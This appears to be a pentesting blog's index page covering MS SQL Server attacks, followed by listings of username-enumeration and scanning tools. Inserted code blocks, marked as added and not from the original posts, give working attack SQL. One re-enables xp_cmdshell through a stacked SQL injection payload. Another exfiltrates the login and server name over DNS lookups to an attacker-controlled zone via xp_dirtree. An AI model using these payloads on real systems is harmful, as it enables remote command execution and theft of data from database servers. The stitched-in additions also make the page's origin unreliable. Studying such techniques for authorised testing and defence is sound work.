pentest

Enabling xp_cmdshell for SQL Server 2005

It’s disappointing to exploit a SQL injection, find you’re “sa”, then realise they’ve disabled xp_cmdshell (it is off by default from SQL Server 2005 onwards). Fortunately, it’s possible to re-enable it quite easily…
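The re-enable sequence, as an added example that is not taken from the post itself. It assumes the current login holds the sysadmin role (the “sa” situation above); sp_configure, RECONFIGURE and sys.configurations are the real SQL Server mechanisms, while the `whoami` probe and the injection prefix are illustrative only:

```sql
-- Added example (not from the original post): turning xp_cmdshell back on.
-- Assumes the login is in the sysadmin role. The 'whoami' command is just a
-- probe to prove the procedure works again.

-- 1. Confirm the current state: value_in_use = 0 means the option is disabled.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. xp_cmdshell is an "advanced" option, so it cannot be set with
--    sp_configure until advanced options are exposed. RECONFIGURE applies
--    each change immediately (no service restart needed).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Verify it took, then use it.
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
EXEC master..xp_cmdshell 'whoami';

-- 4. When the test is over, put the box back the way you found it.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- Through a SQL injection point the four statements in step 2 have to go in
-- as one stacked query in a single request, e.g. for a string parameter:
--   '; EXEC sp_configure 'show advanced options',1; RECONFIGURE;
--      EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; --
```

Two things to keep in mind: every sp_configure change is written to the SQL Server error log, so this is not a quiet operation, and the injection form only works if the application’s database driver allows stacked (`;`-separated) statements, which most MSSQL drivers do.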

Exfiltrating Data From MS SQL Server Via DNS

Exfiltrating data via Blind SQL Injection vulnerabilities can be slow, or at the very least undesirably noisy. DNS may provide a faster alternative if the target system is connected to the Internet (or, more precisely, can resolve external DNS names through its configured resolver).
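One way to make SQL Server leak a value through DNS, as an added example rather than the method the post itself describes: force a UNC path lookup with xp_dirtree, which makes the server resolve a hostname we control. `exfil.example` stands in for an attacker-controlled DNS zone, and the login, server name and label sizes are assumptions for illustration:

```sql
-- Added example (not from the original post): exfiltrating a value by making
-- the database server resolve a hostname under an attacker-controlled zone.
-- Assumptions: "exfil.example" is a zone whose authoritative server we run and
-- log queries on; the DB host can resolve external names. xp_dirtree is not
-- gated by the xp_cmdshell option, which is what makes it attractive here.

DECLARE @secret VARCHAR(100);
DECLARE @hex    VARCHAR(300);
DECLARE @name   VARCHAR(253);
DECLARE @path   VARCHAR(300);
DECLARE @pos    INT;

-- Value to exfiltrate (here: the current login and the server name).
SELECT @secret = SUSER_SNAME() + '|' + @@SERVERNAME;

-- Hex-encode so that arbitrary characters survive as DNS labels.
-- fn_varbintohexstr exists on SQL Server 2005; strip its leading '0x'.
SET @hex = SUBSTRING(master.dbo.fn_varbintohexstr(CONVERT(VARBINARY(100), @secret)), 3, 300);

-- DNS labels are limited to 63 octets, so split the hex string into
-- 60-character labels separated by dots.
SET @name = '';
SET @pos = 1;
WHILE @pos <= LEN(@hex)
BEGIN
    SET @name = @name + SUBSTRING(@hex, @pos, 60) + '.';
    SET @pos = @pos + 60;
END
SET @name = @name + 'exfil.example';

-- A UNC path forces a hostname lookup before any SMB connection is attempted;
-- the query reaches the authoritative server for exfil.example whether or not
-- the share exists, and the directory listing result is irrelevant.
SET @path = '\\' + @name + '\x';
EXEC master..xp_dirtree @path;
```

On the receiving side, log queries on the authoritative name server (or run a packet capture on it), join the labels and hex-decode them. If the same value is requested twice the resolver cache will swallow the second lookup, so prefix each name with a unique counter or timestamp label when leaking repeatedly.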

Preventing Web-based Directory Enumeration Attacks

Here are some thoughts on how to prevent directory-name guessing (e.g. checking for http://host/admin, http://host/private, etc.).

ftp-user-enum

Username guessing tool for use against the default Solaris ftp service and GNU inetutils ftpd.  Recent changes are detailed in the CHANGELOG. Download ftp-user-enum v1.0 here. SHA1sum: 2fbd86dba9f701627d415ed76100b2768b271862 MD5sum: c19ec3eb1eab6282a16514b51eb5f1c6 User documentation is also available in PDF format.

finger-user-enum

Username guessing tool primarily for use against the default Solaris finger service. Also supports relaying of queries through another finger server.  Recent changes are detailed in the CHANGELOG. Download finger-user-enum v1.0 here. SHA1sum: 017e214e786df5a25336291acd3b9c8a46b3bd7b MD5sum: f18832f9d2b5210e5f51bd89f44abeee User documentation is also available in PDF format.

smtp-user-enum

Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO.  Recent changes are detailed in the CHANGELOG. Download smtp-user-enum v1.2 here. MD5 and SHA1 checksums of the packages can also be downloaded.  They’re based on the package name (below, v.v represents the version, e.g. 1.1): http://pentestmonkey.net/tools/smtp-user-enum/smtp-user-enum-v.v-beta.tar.gz.md5 […]

rsh-grind

Basically tries lots of combinations of local and remote usernames to execute commands via RSH. Download rsh-grind here. SHA1sum: f1b37abb6ad54df775c1cf194ab91fd41d607f1f MD5sum: 2ecae8730f89c697f2512181ded3842f User documentation is also available in PDF format.

dns-grind

Tool for performing lots of DNS queries quickly. Download dns-grind v1.0 here. SHA1sum: db2beb7ca6caf4343f81936d78617f02b87da024 MD5sum: f145a5acf5cc53507d9be147adbe384e User documentation is also available in PDF format.

yapscan

TCP Half-open port scanner / fast ICMP scanner. Some limited support for UDP scans too. It’s beta, but still kinda useful. Download Yapscan v0.7.4-beta as tar.gz. Recent changes are detailed in the CHANGELOG. Update: You’re better off using the SVN copy on google code.  It’s more up to date. MD5 and SHA1 checksums are the […]

A Penetration Testing Site

The pentestmonkey website is under heavy construction right now. Eventually I hope to fill it with tools to take some of the monkey work out of pentesting. Check out the collection so far. The tools are all released under the terms of the GPL, so you’re free to use them for commercial or non-commercial purposes, […]